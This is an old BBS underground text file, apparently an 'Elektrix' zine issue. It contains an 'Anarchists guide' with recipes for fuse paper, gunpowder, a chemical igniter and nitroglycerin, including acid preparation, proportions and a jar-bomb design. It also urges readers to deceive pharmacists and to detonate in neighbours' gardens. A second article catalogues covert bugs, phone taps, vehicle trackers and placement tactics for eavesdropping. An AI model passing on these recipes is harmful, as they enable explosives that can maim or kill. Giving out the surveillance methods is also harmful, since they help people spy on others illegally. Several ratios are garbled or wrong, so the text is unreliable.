|
filter off any rubbish.
|
|||
|
|
|||
|
This is really simple to make but quite effective...Just take the Sodium
|
|||
|
Chlorate (pure or weedkiller) and then make a solution of it (put in water).
|
|||
|
Then soak the paper in the water and leave to dry on a radiator.
|
|||
|
|
|||
|
When the paper is dry it will burn with some loud pops and just as fusepaper
|
|||
|
so you have made your own fuses. Now to put the fuses to work....(hehe)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
GUNPOWDER
|
|||
|
|
|||
|
Gunpowder is great stuff - though not really as exciting as plastic or
|
|||
|
high-explosive it can be good fun for fireworks, bangers and not so large
|
|||
|
explosions.
|
|||
|
|
|||
|
You will need: Sulphur - Obtain this from your chemist. Yup! Just ask
|
|||
|
for 'flowers of sulphur' (what a stupid name
|
|||
|
for it!)
|
|||
|
|
|||
|
Carbon - Best just to use crushed charcoal for this.
|
|||
|
|
|||
|
Potassium - Get this from a gardenshop (ask for Saltpetre).
|
|||
|
Nitrate Can also use Sodium Nitrate in 'Weedol weed-
|
|||
|
killer' - but not actually as good.
|
|||
|
|
|||
|
Making gunpowder from this is just too easy.....Just grind each substance
|
|||
|
until it is a fine powder....then mix them in the following ratio:
|
|||
|
|
|||
|
Potassium Nitrate : Sulphur : Carbon
|
|||
|
1 : 3 : 7
|
|||
|
|
|||
|
Once mixed well you have made gunpowder - pack it in a confined space - add
|
|||
|
a fuse with the FUSE PAPER as shown above and you have a 'low-explosive'. It
|
|||
|
can be great fun. If you want to light the gunpowder with a short delay of
|
|||
|
about twenty seconds or so without the need for matches or lighters then use
|
|||
|
a FIRELIGHTER as shown next.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIRELIGHTER
|
|||
|
|
|||
|
Not really much to this but useful for delayed firelighting with the use of
|
|||
|
matches or lighting materials.
|
|||
|
|
|||
|
You will need: Glycerin - Get it from your kitchen/medicine drawer.
|
|||
|
|
|||
|
Potassium - This is now more commonly referred to as
|
|||
|
Permanganate potassium (vii) manganate and can be picked
|
|||
|
up at the chemist. If they ask you what you
|
|||
|
want it for just say 'water-purification'.
|
|||
|
|
|||
|
Sugar - If you can't get this; you really are lame!
|
|||
|
|
|||
|
Ok. Take the stuff separately in the following proportions:
|
|||
|
|
|||
|
Glycerin : Potassium Permanganate : Sugar
|
|||
|
3 : 9 : 1
|
|||
|
|
|||
|
Crush the sugar and the glycerin up real well (icing sugar works well) then
|
|||
|
just pour the glycerin on top and watch - change the proportions a bit and
|
|||
|
you can have some real fun - try putting a bit of Sulphur in! Hehehehe You
|
|||
|
can also use this as a detonator for a low-explosives such as gunpowder as
|
|||
|
it doesn't go out easily!!! Also if you get a lot of it and a good ratio it
|
|||
|
can be used as a good smoke bomb for indoors since you can run off and it's
|
|||
|
not going then a minute later there's sweet smoke * EVERYWHERE * and phuck
|
|||
|
it doesn't set most smoke alarm detectors off!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NITROGLYCERIN
|
|||
|
|
|||
|
Contrary to what people may have told you:
|
|||
|
|
|||
|
1) It's very easy to make (if you have the fractional distillation gear).
|
|||
|
2) It doesn't blow up when you drop it - cos homemade isn't usually pure
|
|||
|
enough.
|
|||
|
|
|||
|
Ok. You will need: Sulphuric Acid - Go to a garage and ask for some battery
|
|||
|
acid or crack open a battery (dumper
|
|||
|
truck batteries are cool - can give 400
|
|||
|
amps current output!!! Whew!) You can
|
|||
|
sometimes get it at harbours.
|
|||
|
|
|||
|
Sodium Nitrate - Weedkiller - this time get the 'WEEDOL'
|
|||
|
one with Sodium Nitrate in it or any one
|
|||
|
with Sodium Nitrate.
|
|||
|
|
|||
|
Glycerin - From kitchen as before.
|
|||
|
|
|||
|
Now the thing with this is that in order to actually MAKE nitroglycerin you
|
|||
|
will need Conc.Nitric acid and Conc.sulphuric as well as the glycerin. The
|
|||
|
sulphuric is easy to do - battery acid is roughly 69% pure - the rest being
|
|||
|
water. The best way to get conc. sulphuric therefore is to heat the acid to
|
|||
|
* VERY * hot (400 degrees plus) and then leave it for a long time until its
|
|||
|
acidity increases a great deal (like well nasty!). Get a litre of Sulphuric
|
|||
|
acid concentrated and store it in a glass bottle. [Wash yer hands too - its
|
|||
|
not nice stuff].
|
|||
|
|
|||
|
Now getting the Nitric acid in any form is well difficult unless you have
|
|||
|
access to it at college/work etc. The best way I've found is to take Sodium
|
|||
|
Nitrate weedkiller and do the following:
|
|||
|
|
|||
|
1) Purify the Sodium Nitrate from the weedkiller by making a saturated soln.
|
|||
|
and then crystallizing it and washing the crystals and filter off any
|
|||
|
nasties...Now you have Sodium Nitrate (reasonably pure).
|
|||
|
|
|||
|
2) Then take the Sodium Nitrate crystals and crush them into a powder or as
|
|||
|
close as you can get.
|
|||
|
|
|||
|
3) Now you want to sort of extract the nitrate - for this you will need fair
|
|||
|
distillation equipment. You are attempting to make Nitric Acid from the
|
|||
|
Sodium Nitrate by reacting it with some of the Sulpluric acid which was
|
|||
|
concentrated from before.
|
|||
|
|
|||
|
i) Pour Sulphuric acid in here
|
|||
|
||
|
|||
|
|D2|___ D5 <- Nasty gases will be coming out of
|
|||
|
Put the | _ \ ______ || here - Nitrogen Dioxide (toxic!!!)
|
|||
|
Sodium | / \ \D3 | ___ \ ||
|
|||
|
Nitrate | | \ \___| | _| |_||_
|
|||
|
crystals | | \------| | | | || | <----- Clear container with Nitrogen
|
|||
|
in here /D1\ /\ |-| |----| Dixode bubbling through the
|
|||
|
----> \__/ || |___D4___| water to turn it to Nitric Acid
|
|||
|
HEAT ||
|
|||
|
That is a cooling bracket (yeh I know it looks nothing like one but thats
|
|||
|
life with TXT files!)...I hope that solves confusion over the following
|
|||
|
instructions...Bet it doesn't! hah
|
|||
|
|
|||
|
ii) Right assemble the distillation/fractional distillation equipment or
|
|||
|
homemade equipment if that's what you've done as shown above.
|
|||
|
|
|||
|
iii) Put the Sodium Nitrate crystals in the flat bottomed flask (D1) and
|
|||
|
you may want to put some anti-bumping granules in too (tiny bits of
|
|||
|
glass).
|
|||
|
|
|||
|
iv) Don't connect D4 or D5 at this time - just a bowl to get any crap that
|
|||
|
comes off early.
|
|||
|
|
|||
|
v) Start pouring in the Sulphuric Acid(D2) and keep the mixture hot so the
|
|||
|
reaction is real good. When it gets to around 79 degrees (I think) or
|
|||
|
so then a red sort of mist comes about inside the equipment - don't
|
|||
|
run like phuck away but be worried all the same since you have to move
|
|||
|
fast now.....Connect D4 and D5 and make sure you don't breathe in any
|
|||
|
of the red smoke (Nitrogen Dioxide) [If you wanna intoxicate yerself
|
|||
|
then read my third Anarchists guide on....chemical weapons (dioxins)].
|
|||
|
(It's probably best to make sure you don't breathe the crap in by add-
|
|||
|
ing a second D4 thing on the end of D5 to filter off as much vapour as
|
|||
|
possible).
|
|||
|
|
|||
|
vi) Once that's all over then you will have a nice concentrated nitric acid
|
|||
|
in D4.....
|
|||
|
|
|||
|
[BTW - Remember to keep the cooling bracket D3 real cool with fresh cool run
|
|||
|
ning water - or you won't get much at all].
|
|||
|
|
|||
|
|
|||
|
NOTE: IT'S BEST TO STORE NITRIC ACID WHEN CONCENTRATED IN STEEL CONTAINERS
|
|||
|
WHICH CAN RESIST THE CORROSIVE ACTION....USE GLOVES AT ALL TIMES...
|
|||
|
|
|||
|
|
|||
|
4) Ok so now you have Sulphuric acid conc., Nitric acid conc. and glycerin.
|
|||
|
Now for the difficult bit! (Haha You thought the worst was over)
|
|||
|
|
|||
|
5) Right this is a *** VERY *** dangerous bit.........
|
|||
|
|
|||
|
DON'T DO IT INDOORS...OR IN THE GARAGE - DO IT IN AN ISOLATED FIELD NEAR
|
|||
|
YER HOUSE...IF YOU DON'T HAVE ONE THEN USE YER NEIGHBOURS GARDEN...
|
|||
|
|
|||
|
Get a wooden tray or box and fill it with ICE....make sure there's always
|
|||
|
ice to stack it up - it * MUST * remain cool. Then get a conical flask
|
|||
|
(phuck a round-bottomed one)...and a thermometer measuring up to 100 C.
|
|||
|
|
|||
|
Balance the flask carefully and securely in the ice bath and put the
|
|||
|
thermometer in.
|
|||
|
|
|||
|
Get the Sulphuric, Nitric and glycerin in the following proportions:
|
|||
|
|
|||
|
Glycerin : Conc.Nitric : Conc.Sulphuric
|
|||
|
3 : 1 1
|
|||
|
|
|||
|
I recommend using 1/2 litre quantities of both acids for the first batch.
|
|||
|
|
|||
|
|
|||
|
6) WARNING: You are using conc.acids - they do not like water - they will
|
|||
|
blow you up if you mistreat them by feeding them water - Make sure all
|
|||
|
parts inside the equipment are PHUCKING dry.
|
|||
|
|
|||
|
Put the nitric acid into the flask and then * VERY * slowly pour in the
|
|||
|
sulphuric acid whilst watching the temperature....(use a dropper).
|
|||
|
|
|||
|
MAKE SURE: If the temperature ever goes about 30 degrees C then pour the
|
|||
|
contents of the flask into the ice bath and run like ****** PHUCK ******
|
|||
|
|
|||
|
As the temperature rises add the glycerin with a pipette (dropper) and
|
|||
|
don't pour on any more until the temperature drops and is stable.
|
|||
|
|
|||
|
|
|||
|
7) Repeat this until all the ingredients are gone......
|
|||
|
|
|||
|
8) Take the jar (very carefully - it's never blown up on me - but there's
|
|||
|
a first for everything!) with the mixture of acids in it and look at the
|
|||
|
bottom - there will be a layer that isn't quite colourless.....This is
|
|||
|
the stuff you want. [^^^^^ At the bottom]
|
|||
|
|
|||
|
9) Carefully take off the top acid layer with a dropper/pipette or whatever
|
|||
|
and store it for later use.
|
|||
|
|
|||
|
10) When you get near to the bottom layer (ie. Nitroglyerin) then carefully
|
|||
|
pour on water to wash away the acids. Then let it settle again - repeat
|
|||
|
this until you are satisfied that the acids are as gone as you can get
|
|||
|
them - four or five times.
|
|||
|
|
|||
|
11) Now collect the nitroglycerin in a dry jar or something and carry it back
|
|||
|
to your fridge in the ice bath (***** VERY CAREFULLY *****).
|
|||
|
|
|||
|
12) Now keep your nitroglycerin nice and cold (so it doesn't blow up your
|
|||
|
house when you're watching TV or on your computer).
|
|||
|
|
|||
|
|
|||
|
You can store Nitroglycerin in Kieselguhr (a type of clay) - then it's
|
|||
|
easier to handle and store - add a fuse and you have dynamite.
|
|||
|
|
|||
|
|
|||
|
You have now made nitroglycerin - now what to do with it?......
|
|||
|
|
|||
|
|
|||
|
USE OF NITROGLYCERIN
|
|||
|
|
|||
|
|
|||
|
Nitroglycerin is ofcourse a VERY high explosive. Not as high as good old
|
|||
|
tri-nitro-toluene (TNT) but you'd find it real hard to make TNT - since
|
|||
|
it most CERTAINLY can't be made with ordinary Sulphuric Acid.....you DO
|
|||
|
need fuming sulphuric acid (a totally different substance).
|
|||
|
|
|||
|
So what to do with it?
|
|||
|
|
|||
|
Well if you want to blow it up you're unlikely to do it without using a
|
|||
|
lighted fuse/detonator......it needs quite a kick to start itself off. You
|
|||
|
can use gunpowder if you pack in into a tight space (see earlier) but the
|
|||
|
best detonation cap I've come across is Mercury (ii) Fulminate - see Part3
|
|||
|
of 'The Anarchists guide to...' for information on this and other kinds of
|
|||
|
detonators. But saying that gunpowder still works well.....
|
|||
|
|
|||
|
An idea (never tried it but worth a go):
|
|||
|
|
|||
|
Try putting this lot in a jar with a fuse hanging out........
|
|||
|
|
|||
|
____
|
|||
|
------------| | | -------- Nitroglycerin (not to scale)
|
|||
|
Fuse |__|_|
|
|||
|
(made with
|
|||
|
fuse paper) |
|
|||
|
|
|
|||
|
|
|
|||
|
|
|||
|
Gunpowder (used as detonation cap)
|
|||
|
|
|||
|
|
|||
|
DO THIS IN A VERY ISOLATED PLACE.......LIKE AN ISLAND OR A FOREST....SINCE
|
|||
|
THE EXPLOSION IS * VERY * LOUD AND * VERY * WIDESPREAD.
|
|||
|
|
|||
|
*** YOU ONLY NEED A FEW DROPS TO MAKE A DECENT EXPLOSION!!!!!! ***
|
|||
|
|
|||
|
If you want to know about more stuff to use your Nitroglycerin for then you
|
|||
|
can contact me on Palm Beach BBS +44(303)-265979 as Deceptor.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
HOT STUFF
|
|||
|
|
|||
|
Don't really know what to call this other than 'HOT STUFF' - it gets bloody
|
|||
|
hot and it eats away at Aluminium in seconds (well almost! heh).
|
|||
|
|
|||
|
1) Just go to the supermarket and buy some 'DRAINO' or stuff for unblocking
|
|||
|
drains.
|
|||
|
|
|||
|
2) Make sure it's the powder one and take out all the bits of metal. Then
|
|||
|
mix the leftover powder with water to make a hot and steaming liquid.
|
|||
|
|
|||
|
The mixture will then eat at aluminium, etc and really nicely - It doesn't
|
|||
|
like bicycles....they tend to disappear after a while.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
That's it for this Issue of Elektrix.....Stay in tune for Laser Weaponry....
|
|||
|
Detonators.....Rocket Launchers......Grenades......and more in the next!
|
|||
|
|
|||
|
|
|||
|
TO JOIN THE ANARCHISTS UNDERGROUND MAIL ME AT PALM BEACH
|
|||
|
ONLY COMPETENT ANARCHISTS NEED APPLY (DECEPTOR)
|
|||
|
|
|||
|
|
|||
|
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
|
|||
|
|
|||
|
----------------------------------------------------------------------------
|
|||
|
| |
|
|||
|
| ELEKTRIX Issue 1 - Part 3 |
|
|||
|
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
|||
|
| |
|
|||
|
| A discussion of Electronic Surveillance techniques |
|
|||
|
| by The Technic |
|
|||
|
| |
|
|||
|
| PALM BEACH BBS UK ++44(303)-265979 |
|
|||
|
| |
|
|||
|
----------------------------------------------------------------------------
|
|||
|
Electronic Surviellance
|
|||
|
|
|||
|
Who'd bug me? I hear you ask what for, well just remember that with teh
|
|||
|
introduction of EPSS in teh sattes and System X over here every call has a log
|
|||
|
and that log contains who you called, where it was from and how long. In a rec
|
|||
|
article in the Guardian it pointed out that BT and the police kept 40 people
|
|||
|
"Under Surviellance" for 9 months before actaully arresting them for telephone
|
|||
|
fraud. Still think no-one wants to bug you?, well later on there are some hand
|
|||
|
tips to detect thses bugs but first you need to know what they are:
|
|||
|
|
|||
|
|
|||
|
Body Mics.
|
|||
|
|
|||
|
These are just mics which are concealed on the body, then hooked up to a
|
|||
|
transmitter or a recorder. These range from flat microphones taped to the skin
|
|||
|
or tieclips, cufflinks, wrist watches whatever you need.
|
|||
|
|
|||
|
Condenser mics need their own power as they modify the power in accordance wit
|
|||
|
the sound so results in thicker leads.
|
|||
|
|
|||
|
Range: Small and can pick up a lot of background noise
|
|||
|
|
|||
|
Conditions: Close contact, quiet - good for conversations etc.
|
|||
|
|
|||
|
Cost: Relatively cheap.
|
|||
|
|
|||
|
|
|||
|
Contact Mics. Spikes. Tube Mics.
|
|||
|
|
|||
|
This allows the eavesdropper to listen in on someone in the next room, they
|
|||
|
come in several types.
|
|||
|
|
|||
|
|
|||
|
Contact Mics
|
|||
|
|
|||
|
These mics respond to vibrations in a sounding board like a door, and are
|
|||
|
available as pickups for guitars etc. The sounding board can be a door, a
|
|||
|
window, or a thin wall and only need to be pressed or glued to the board.
|
|||
|
As the wall gets thicker it is harder ( if not impossible ) to use a contact
|
|||
|
mic. this can be solved with ....
|
|||
|
|
|||
|
Spikes
|
|||
|
|
|||
|
A spike is a spike of hardened steel which is hammered into the wall and nearl
|
|||
|
comeout at the other end - but not quite, then a microphone is mounted on the
|
|||
|
spike which will pick up the vibrations from the next room.
|
|||
|
|
|||
|
|
|||
|
Tube Mikes
|
|||
|
|
|||
|
These are simply microphones in a sealed box with a small plastic tube
|
|||
|
protruding from it. Then connect the mic to an amplifier and then stick the
|
|||
|
tube where u want (a keyhole) and then listen. You can drill a hole in the wal
|
|||
|
or use the back to back sockets in hotels, if drilling make sure that no bits
|
|||
|
plaster fall off - common method of detection.
|
|||
|
|
|||
|
Range: Next room or can be used with a transmitter
|
|||
|
|
|||
|
Conditions: Just needs to be close
|
|||
|
|
|||
|
Cost: The mics are cheap but the radio bugs and associated equipment can be
|
|||
|
expensive
|
|||
|
|
|||
|
|
|||
|
Small Directional Mics.
|
|||
|
|
|||
|
These are designed to be used at short distances and directional so they can
|
|||
|
pick up a conversation. Can be mounted in a briefcase or in a pen etc. and mus
|
|||
|
be aimed at the target - the briefcase one can be conected to a tape recorder.
|
|||
|
Pen or sleeve types can be connected to a pocket recorder. A variation is a MI
|
|||
|
mounted in a small bell shaped object and is held in the hand, then you walk i
|
|||
|
front of the trget and they will not suspects anyone following from the front.
|
|||
|
|
|||
|
Range: Small and can pick up a lot of background noise
|
|||
|
|
|||
|
Conditions: Useless in a crowded street, or with something between target and
|
|||
|
|
|||
|
Cost: Relatively cheap.
|
|||
|
|
|||
|
|
|||
|
Shotugn, Machine Gun, Rifle Mics.
|
|||
|
|
|||
|
These are long distance directional microphones, and often have handles and
|
|||
|
can resemble guns ( be careful when aiming one of these at someone as they
|
|||
|
might think it is a gun and you might not be wearing a bullet proof vest).
|
|||
|
These are then hooked up to an amplifier or tape recorder, swing from left
|
|||
|
to right and stop when sound is loudest. These can be difficult to conceal
|
|||
|
and difficult to aim, also without a frequency analyser to level out sounds
|
|||
|
any background noise can drown the conversation.
|
|||
|
|
|||
|
Range: can be several hundred feet Conditions: calm weather and quiet
|
|||
|
|
|||
|
Cost: expensive with amp and accesories
|
|||
|
|
|||
|
Parabolic Mics.
|
|||
|
|
|||
|
These are very like rifle mikes, usually a large circular metal or plastic dis
|
|||
|
which reflects sound to a microphone mounted in the centre of the dish. They
|
|||
|
are not as sensitve as rifle mics. but are a lot cheaper, they are bulky thoug
|
|||
|
and difficult to hide. You can hide a rifle mike under a long coat but not a
|
|||
|
dish unless your a woman who happens to be pregnant. Can use bird song
|
|||
|
recording as a cover - with a bird book in your pocket etc. tweed jacket.
|
|||
|
Condenser or Crystal mics best for long range devices, output is usually highe
|
|||
|
than dynamic mics. These can be bought anywhere - cheap.
|
|||
|
|
|||
|
Range: can be several hundred feet Conditions: calm weather and quiet
|
|||
|
|
|||
|
Cost: expensive with amp and accesories
|
|||
|
|
|||
|
Like rifle MIC.
|
|||
|
|
|||
|
|
|||
|
Radio Bugs
|
|||
|
|
|||
|
This is a small transmitter with a microphone. The devices can be combined to
|
|||
|
perform as a reciever and a microphone ( used in mind reading acts ). They are
|
|||
|
broadly split into two types - those which power them selves and those which
|
|||
|
draw power from some source. Bear inmind the size also has to include the
|
|||
|
antenna which can be several inches long. There is a problem of signal drift
|
|||
|
which can be overcome with a crystal control - but this requires more power.
|
|||
|
|
|||
|
If they are not diguised they can be a dead give away ( they reciver doesn`t
|
|||
|
need to be disguised as the bugs can be tuned to operate on FM (VHF) or AM so
|
|||
|
just listen in your radio or car radio), to get around this several novel
|
|||
|
methods of disguise have been used.
|
|||
|
|
|||
|
Martini Olive Bug
|
|||
|
|
|||
|
This is designed to look like an olive on a cocktail stick, the transmitter
|
|||
|
is the olive and the antenna the stick. Range about fifty feet and can functio
|
|||
|
happily at the bottom of the glass.
|
|||
|
|
|||
|
Sugar-Cube Bug
|
|||
|
|
|||
|
This has two audio frequency circuits and three radio frequency circuits.
|
|||
|
Sealed in a protective silicon shell designed to resemble a sugar cube. Can
|
|||
|
transmit while at the bottom of a cup of coffee.
|
|||
|
|
|||
|
Pen Bug
|
|||
|
|
|||
|
Ball point or fountain pen and switched on by twisting the barrel or removing
|
|||
|
the cap and placing on the other end and they write.
|
|||
|
|
|||
|
Calulator Bug
|
|||
|
|
|||
|
Transmitter is built into a popular calculator which will function normally
|
|||
|
and can draw power from the calculator battery.
|
|||
|
|
|||
|
Plug Bug
|
|||
|
|
|||
|
Looks like a standard 13 amp plug but has a transmitter whihc has own battery
|
|||
|
or can draw power from mains. Also can use earth wire as antenna.
|
|||
|
|
|||
|
Adaptor Bug.
|
|||
|
|
|||
|
Works like an ordinary plug but transmitter built in , can use mains power.
|
|||
|
|
|||
|
Light Switch Bug
|
|||
|
|
|||
|
Built into the back of a rocker type light switch and draws power from mains
|
|||
|
supply - two models available - one which is on all the time and one which
|
|||
|
transmits only when the light is on.
|
|||
|
|
|||
|
A problem with all these bugs is the limited battery life, there are several
|
|||
|
methods of extending battery life. Vox activated - these have a preset level
|
|||
|
at which they will switch on and a delay when they stop (so they dont stop whi
|
|||
|
there is a gap in a sentance) but because of the switch the bug is bigger.
|
|||
|
Another method is to incorporate a timer circuit and this will turn the bug
|
|||
|
on and off when set ( digital watch technology) can be set 9-5 when people are
|
|||
|
in offices. A more expensive way is to use a radio controlled bug, a coded
|
|||
|
signal is sent to activate the bug and then it switches off after two minutes.
|
|||
|
Very expensive though.
|
|||
|
|
|||
|
HOMERS
|
|||
|
|
|||
|
These are radio transmitters used to track someone, it is simply a transmitter
|
|||
|
which sends high powered pulses and a reciever picks them up as a series of
|
|||
|
beeps, the transmitter is usually the size of a cigarette packet and has a sho
|
|||
|
rigid aerial sticking out and a couple of powerful magnets to hold it onto the
|
|||
|
car. The receivers depend on what you can afford, simplest is one with no
|
|||
|
direction capabitlity and relies on volume - the closer you get the louder it
|
|||
|
gets. Then there are those which indicate direction , this can be a vertically
|
|||
|
mounted loop aerial or a pair of aerials on on each side of the vehicle. When
|
|||
|
you pick up the sound turn until it is loudest then you are in the same plane
|
|||
|
as the homer then you can gauge how far away by the speed of the beeps ( the
|
|||
|
faster the closer) this plane can be behind you as well as in front though.
|
|||
|
Some extra features are range control - you switch as you get closer e.g
|
|||
|
1st settings beeps until a continuous tone then within 6 miles, then 2nd setti
|
|||
|
this goes into a continuous tone within one mile etc. Another feature can be t
|
|||
|
null switch , if the target is directly in front or behind you there is no sou
|
|||
|
if the target moves left or right you will get a tone ( different for left and
|
|||
|
right). Doppler shift recievers will tell you in which direction the target i
|
|||
|
moving but its expensive.
|
|||
|
|
|||
|
Homing people can be done by incorporating the homer into a card ( business or
|
|||
|
credit, make sure its think or coloured so the electronics can`t be seen) but
|
|||
|
you canot have a battery so it relies on the radiation given out by Tv sets an
|
|||
|
radio`s and other electrical appliances and converts them into a series of bee
|
|||
|
They are only suitable for close work.
|
|||
|
|
|||
|
Laser Bug
|
|||
|
|
|||
|
This is rather like a contact mike as it relies on the vibrations produced by
|
|||
|
sound on the window, it reflects light waves and when they hit the window they
|
|||
|
will be modulated slightly. Feed a pulsed power supply to a laser and direct t
|
|||
|
beam at the window and some of this light will be reflected back, use a good
|
|||
|
astronomical telescope to focus the light and then it passes through a pinhole
|
|||
|
and onto a photomultiplier tube. The tube and its electronics detects variatio
|
|||
|
in pulse width and translates them back into sound. Infra red can be used, but
|
|||
|
you will have to use an ordinary light source to target it. Another way is to
|
|||
|
use cd lasers to pick up conversations and transmit them to a receiver miles
|
|||
|
away but you will have to line it up VERY accurately. It is also hard to detec
|
|||
|
or stumble across accidently.
|
|||
|
|
|||
|
Infra Red Transmitter
|
|||
|
This can transmit up to 500 metres and is similar to a radio bug, the bug
|
|||
|
must be by a window though and a special reciever is needed ( maybe in a camer
|
|||
|
|
|||
|
|
|||
|
Telephone Tapping
|
|||
|
|
|||
|
Tapping telephones can be done several ways and each relies on different
|
|||
|
equipment.
|
|||
|
|
|||
|
Inductive Tap
|
|||
|
|
|||
|
Induction microphones are very cheap and be bought anywhere , they are a
|
|||
|
couple of inches long and about half an inch across (cylindrical), it has two
|
|||
|
wires coming out of one end and a sucker on teh other end. The wiring can go t
|
|||
|
a tape recorded or an amplifier, obviu\ously this can`t be used but there are
|
|||
|
mics which are disguised as pads or other desk objects, in most cases a minatu
|
|||
|
amplifier is needed. Another type fits over the phone line and alos houses a
|
|||
|
transmitter also it doesn`t cut into the cable although the sound is weak.
|
|||
|
Alos note that they can be detected if a radio transmitter is built in and the
|
|||
|
can pick up humming from electrical devices.
|
|||
|
|
|||
|
Radio Tap
|
|||
|
|
|||
|
These are transmitting bugs specifically designed for use with phones. The mos
|
|||
|
common device in the ...
|
|||
|
|
|||
|
Drop in Mike
|
|||
|
|
|||
|
This is so called as in america the microphone just had to be unscrewed and th
|
|||
|
new transmitter dropped in. It draws its power from the phone and needs no
|
|||
|
maintenance. It acts like a normal microphone and transmits all conversations.
|
|||
|
|
|||
|
Series an Parallel
|
|||
|
|
|||
|
The obvious difference between these is the way in which theuy are connected t
|
|||
|
the phone line, the parallel is connected over both lines whereas the series
|
|||
|
is connected over one, they can both incorporate a small transmitter.
|
|||
|
The Parallel bug can be line or battery powered, but you can get the best of
|
|||
|
both worlds by having them trickle charged - it draws minute quantities and is
|
|||
|
difficult to detect via a meter. Battery powered versions are said to have a
|
|||
|
better range and they operate all the time so could lead to detection. No
|
|||
|
wires have to be cut to install this bug.
|
|||
|
The series bug is more common and cheaper, it can be batery or line powered b
|
|||
|
will only transmit when the phone is in use - this makes detection difficult.
|
|||
|
The line powered versions are smaller , about an inch square and half an inch
|
|||
|
think - hiding it in a phone or junction box is easy.
|
|||
|
|
|||
|
Third Wire Bug
|
|||
|
|
|||
|
These bugs are connected in paralleland normally line powered although a
|
|||
|
rechargable battery version is available. Average size is around 1 and half
|
|||
|
inches by half an inch, it operates like a prallel bug but when not in use
|
|||
|
switches to its own internal microphone and transmits souns from the room,
|
|||
|
this is reputedly favourite amongst USA law enforcement agencies.
|
|||
|
|
|||
|
Infinity Transmitter
|
|||
|
|
|||
|
These are around the size of a third wire bug and are the most exotic type of
|
|||
|
bug. They cannot monitor telephone conversations but the device is line
|
|||
|
powered and can be connected anywhere along the phone line ( or inside the
|
|||
|
phone) the person calls the target and then sends a tone down the line which
|
|||
|
activates the Bug. The tone is matched to a reciving unit in the bug and thus
|
|||
|
they are also known as Harmonica bugs. The bug cancels the bell of the
|
|||
|
victim's phone and uses an internal mic or the phones mic to send the room
|
|||
|
conversation down the line - note that these cannot be used wher ther is a
|
|||
|
switchboard due to the direct dialling technique. There are several variaitons
|
|||
|
of this bug - One device waits for the eavesdropper to dail and then expects a
|
|||
|
tone immediately this cancels the bell so it doesn't even ring. However the
|
|||
|
bell could ring and alert the victim. Another device waits for the victim to
|
|||
|
answer and then says he has a wrong number, when the victim hangs up the
|
|||
|
device is activated. Another device automatically cuts out the handset if the
|
|||
|
phone is lifted so operates normally, some cut off after a certain amount of
|
|||
|
time, some incorporate an led so that installation is easy as the light will b
|
|||
|
on if installed correctly. They don't need batteries or further attention
|
|||
|
once installed. They are very difficult to detect and even the phone company
|
|||
|
can miss it if its off.
|
|||
|
|
|||
|
Hookswitch Defeat
|
|||
|
|
|||
|
This is the switch the handset is dropped onto, by defeating this the micropho
|
|||
|
will still be activated and you can listen in. The defeat can be done by a
|
|||
|
resistor connected across the switch - an amplifier would be needed on the
|
|||
|
listeners side as the volume level will be low. The method is to call up say
|
|||
|
that you have a wrong number and then don't hang up when he does, then listen
|
|||
|
Although this can work for anyone else too so some are remote controlled. (ton
|
|||
|
or radio activated). They are hard to detect and cheap, ( can`t detect as its
|
|||
|
only one component).
|
|||
|
|
|||
|
Drop Out Relay
|
|||
|
|
|||
|
These are widely available and are just electronic switches which switch on
|
|||
|
whenever the phone is in use. Some have their own batteries or line powered
|
|||
|
and can activate taperecorders etc. by the raly - just clip on and put the
|
|||
|
other lead in the tape recorder. They are easy to install and can be used
|
|||
|
legitimately.
|
|||
|
|
|||
|
Lost Transmitters
|
|||
|
|
|||
|
This is a bug which is designed to blend in with the electrical components
|
|||
|
- they are wired into the circuit board and transmit whenever it is in use
|
|||
|
and will pick up sounds from the room. These are very expensive if one is foun
|
|||
|
this means you are dealing with some very nasty people.
|
|||
|
|
|||
|
Direct Tap
|
|||
|
|
|||
|
All you need is a pair of high impedence head phones and connected to the line
|
|||
|
via crocodile clips with a capacitor in between to keep out the phone companie
|
|||
|
electricity. There are many disadvantages as it is very easy to spot and when
|
|||
|
installing and produce clicking noises on the line. A higher voltage will pass
|
|||
|
through the lines or terminals and this can be detected by a meter or bulb, th
|
|||
|
headphones can be replaced by a tranformer and then to a tape recorder.
|
|||
|
Excellent Quality.
|
|||
|
|
|||
|
Ok so there are the bugs now how the F**K do you find them!
|
|||
|
|
|||
|
|
|||
|
BUGGING - Guidelines
|
|||
|
|
|||
|
Stick to these if possible, use own judgement in special situations.
|
|||
|
|
|||
|
Situation Device Used Remarks
|
|||
|
|
|||
|
Rural Rifle,MIC. Bulky, difficult to conceal,
|
|||
|
Location Parabolic mic. need little background noise
|
|||
|
and good weather.
|
|||
|
|
|||
|
Urban Small Directional Difficult to operate in
|
|||
|
Location MIC. crowded streets. Background
|
|||
|
noise a problem.
|
|||
|
|
|||
|
Vehicle Radio bug, Am- FM Power a problem unless
|
|||
|
VHF, connected to car power.
|
|||
|
Can pick up interference fro
|
|||
|
vehicle electrics, effecienc
|
|||
|
will fluctuate as receiver
|
|||
|
will have to follow close
|
|||
|
behind.
|
|||
|
|
|||
|
Tape Recorder Normally lots of space in ca
|
|||
|
( dash, under seat ), but ne
|
|||
|
change tapes. Quality and
|
|||
|
reliability excellent.
|
|||
|
|
|||
|
Restaurants etc. Concealed directional Easy to use, good quality,
|
|||
|
Mike. Get close to target. Table b
|
|||
|
wall - less background noise
|
|||
|
use less against noisy room.
|
|||
|
|
|||
|
Offices/Rooms Tape Recorder Difficult to conceal and nee
|
|||
|
with access. regular access - excellent
|
|||
|
quality.
|
|||
|
|
|||
|
Wired Mic. Range limited to length of w
|
|||
|
can be time consuming to
|
|||
|
install - may lead to detect
|
|||
|
no further attention after
|
|||
|
installation. Quality very
|
|||
|
good.
|
|||
|
|
|||
|
Radio Bug Battery type have a limited
|
|||
|
life but more flexible in
|
|||
|
installation. 100 yard range
|
|||
|
quality can be very poor.
|
|||
|
use VOX ( voice activate) to
|
|||
|
reduce detection.
|
|||
|
|
|||
|
Hookswitch Defeat Open telephone MIC. room
|
|||
|
conservation carried down li
|
|||
|
Resistor, capacitor or diode
|
|||
|
can be used.Can be missed by
|
|||
|
physical search. Works Well.
|
|||
|
|
|||
|
Office/Room
|
|||
|
Without access Contact Mic. Easy and quick, install on
|
|||
|
window, door, or wall. Good
|
|||
|
